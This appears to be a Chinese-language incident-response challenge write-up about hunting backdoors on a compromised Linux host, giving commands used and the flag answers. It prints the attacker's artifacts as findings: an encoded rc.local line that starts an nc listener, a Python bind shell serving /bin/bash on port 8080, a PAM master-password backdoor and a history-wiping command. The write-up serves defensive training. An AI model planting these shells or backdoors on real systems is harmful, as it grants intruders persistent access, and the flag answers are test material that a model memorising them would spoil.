应急响应：玄机_Linux后门应急

https://xj.edisec.net/challenges/95

11关做出拿到万能密码，ATMB6666，后面都在root权限下操作

1、主机后门用户名称：提交格式如：flag{backdoor}

cat /etc/passwd，发现后门用户

flag{backdoor}

2、主机排查项中可以发现到flag{}内以i开头的flag，如flag{ixxxxxxx}

ps -ef 发现flag{infoFl4g}

3、主机排查发现9999端口是通过哪个配置文件如何开机启动的，如/etc/crontab则填写/etc/crontab 的md5 ，提交方式示例：flag{md5}

/etc/rc.d/rc.local

echo d2hpbGUgdHJ1ZTtkbyBub2h1cCBuYyAtbHZwIDk5OTkgLWMgImZsYWd7aW5mb0ZsNGd9IiAyPiYxIDtzbGVlcCAxO2RvbmU7 | base64 -d | nohup bash &
 

base64解码为：

while true;do nohup nc -lvp 9999 -c "flag{infoFl4g}" 2>&1 ;sleep 1;done;

flag{cf8a978fe83579e2e20ec158524d8c06}

4、黑客3s做了记录所有用户的每次登陆的密码的手段，flag为黑客记录的登陆密码日志路径md5,提交方式示例：flag{md5(路径)}

拉到本地IDA打开：/usr/lib/x86_64-linux-gnu/security/pam_unix.so

/tmp/.sshlog

flag{8997d5a1b8dcca5a4be75962250959f7} 

5、给出使用了/bin/bash 的RCE后门进程名称+端口号 如进程名称为sshd，端口号为22，则flag{sshd22}

逐一排查systemctl启动配置文件存放位置
/etc/systemd/system
/usr/lib/systemd/system 
/lib/systemd/system

ls -lat /etc/systemd/system发现可疑文件docker-compose-app.service

查看 内容

继续查看 

 base64解码

import socket, subprocess# Create socket object
s = socket.socket()
s.bind(('', 8080))
s.listen(1)# Continuously accept connections
while True:conn, addr = s.accept()try:# Launch bash shell connected to this socketsubprocess.call(['/bin/bash'], stdin=conn, stdout=conn, stderr=conn)finally:# Ensure the connection is closed after useconn.close()

后门代码，开启的8080端口

netstat -tunlp

flag{python38080}

6、找出开机启动的后门服务名称MD5，提交flag{md5(服务名)}

docker-compose-app.service

flag{5213e47de16522f1dc3f9e9ecc0ab8b0}

7、渗透提权获得root目录下的flag

cat /root/flag

flag{ATMB_root}

8、黑客3s埋了一个flag在权限维持过程中的地方，可以发现flag{}括号内的首字母是c开头，如flag{cxxxxxxx}

find / -type f -newermt '2024-09-24 01:30:00' ! -newermt '2024-09-24 23:31:00' 2>/dev/null|grep -v docker

找出指定时间修改过的文件，逐一排查

cat -A /var/spool/cron/crontabs/root，发现flag，加-A 参数

 flag{cr0nt4b_IRfind}

9、黑客3s做了一个root用户执行cat命令就删除文件的操作，请发现删除了什么文件将文件名作为flag提交

flag{./bash_history}

10、黑客3s很执着清理痕迹，并做了一个持续删痕迹的手段，请发现手段并给出删除的完整黑客删除命令的md5，如flag{md5(rm -f /var/log/ssh.log >/dev/stdout)} 

下载/home/user/Noral.so，IDA打开反编译

 rm -rf ~/.bash_history >/dev/null 2>&1

MD5：flag{b0f531b39d88d4f603fc89bd4dd2c0aa}

11、黑客3s设置了一个万能密码后门使得这一个万能密码可以以所有用户身份登陆，也不影响原来密码使用。请发现这个万能密码，提交flag格式为flag{万能密码} 

find / -name 'pam_unix.so' 2>/dev/null

拉到本地IDA打开：/usr/lib/x86_64-linux-gnu/security/pam_unix.so

发现万能密码：ATMB6666

flag{ATMB6666}

参考文章

后渗透之linux持久化控制技术
https://www.ddosi.org/post-exploitation-linux-persistence-techniques/